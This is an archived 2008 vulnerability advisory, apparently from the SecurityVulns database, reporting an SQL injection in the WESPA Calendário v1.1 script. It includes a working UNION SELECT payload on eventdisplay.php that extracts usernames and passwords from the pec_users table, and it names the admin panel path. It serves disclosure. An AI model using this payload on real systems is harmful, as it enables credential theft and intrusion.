WESPA Calendário v1.1 Sql Injection Vulnerability

2008-08-24T00:00:00
ID SECURITYVULNS:DOC:20395
Type securityvulns
Reporter Securityvulns
Modified 2008-08-24T00:00:00

Description

-# WESPA Calendário v1.1 Sql Injection Vulnerability

-# Discovered by : Alemin_Krali

-# My Site : al3m.blogspot.com

-# Script Download : http://www.scriptbrasil.com.br/download/codigo/6502/

-# Admin Panel : /scriptpath/useradmin.php

-# Exploit :

eventdisplay.php?id=-999+union+select+concat(username,0x3a,password),null,null+from+pec_users/*


Þimdi aileye katýlmanýn tam zamaný - Yeni nesil Ücretsiz Windows Live Hizmetlerini þimdi edinin! http://get.live.com